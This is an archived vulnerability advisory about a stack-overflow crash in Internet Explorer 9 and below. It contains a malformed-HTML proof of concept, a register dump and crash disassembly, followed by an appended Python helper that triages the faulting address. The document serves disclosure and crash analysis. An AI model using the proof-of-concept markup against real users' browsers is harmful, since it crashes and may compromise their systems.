securityvulns SECURITYVULNS:DOC:28906
Jan 02, 2013 - 12:00 a.m.

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Author: Jean Pascal Pereira <[email protected]>

Vendor: Microsoft Internet Explorer 9.x and below

Description:

The application is prone to a remote stack overflow vulnerability.

Successful exploitation may lead to arbitrary code execution.


Proof Of Concept:

<table></for xmlns="1">
<td><datetime><colgroup>
<id><dd><col>
</table><object>
<hr><base>


Register Dump:

EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51


Crash Instruction:

7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
7629CF39 24 04 AND AL,4
7629CF3B 0FB6C0 MOVZX EAX,AL
7629CF3E F7D8 NEG EAX
7629CF40 1BC0 SBB EAX,EAX
7629CF42 25 0A010180 AND EAX,8001010A
7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX
7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]
7629CF4C 50 PUSH EAX
7629CF4D 53 PUSH EBX
7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI
7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C]


At 0x7629CF51, a read access violation occurs.

Jean Pascal Pereira <[email protected]> || http://www.0xffe4.org

Copy: http://paste.kde.org/627968/
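
Added example, not part of the original advisory: a small crash-triage helper that parses the register dump above and resolves the memory operand of the faulting instruction, to show which address the read at 0x7629CF51 touched. The function names, the 2 GB user-space limit and the reading of EAX as an HRESULT are assumptions of this example.

```python
import re
# Register dump and faulting instruction, copied from the advisory text.
REGISTER_DUMP = """\
EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51
"""
CRASH_LINE = "7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C]"
USER_SPACE_TOP = 0x7FFFFFFF  # assumption: default 2 GB user space, 32-bit process

def parse_registers(dump):
    """Map register name to its 32-bit value; module annotations are ignored."""
    regs = {}
    for line in dump.splitlines():
        m = re.match(r"\s*(E[A-Z]{2})\s+([0-9A-Fa-f]{8})\b", line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs

def effective_address(instr, regs):
    """Resolve a [REG], [REG+disp] or [REG-disp] operand (hex disp) to an address."""
    m = re.search(r"\[(E[A-Z]{2})(?:([+-])([0-9A-Fa-f]+))?\]", instr)
    if not m:
        raise ValueError("no simple register-relative operand found")
    base, sign, disp = m.groups()
    offset = int(disp, 16) if disp else 0
    return base, (regs[base] + (-offset if sign == "-" else offset)) & 0xFFFFFFFF

def decode_hresult(value):
    """Split a 32-bit value into the HRESULT fields: severity bit, facility, code."""
    return {"failure": bool(value >> 31), "facility": (value >> 16) & 0x7FF,
            "code": value & 0xFFFF}

def triage(dump, instr):
    regs = parse_registers(dump)
    base, addr = effective_address(instr, regs)
    return {"base_register": base, "fault_address": addr,
            "outside_user_space": addr > USER_SPACE_TOP,
            "frame_bytes_esp_to_ebp": regs["EBP"] - regs["ESP"],
            "base_as_hresult": decode_hresult(regs[base])}

if __name__ == "__main__":
    print(triage(REGISTER_DUMP, CRASH_LINE))
```

Facility 7 is FACILITY_WIN32 and code 1726 is RPC_S_CALL_FAILED in the Windows SDK, so under this example's reading the faulting PUSH used an error status in EAX as a pointer base; that interpretation is not a statement from the advisory.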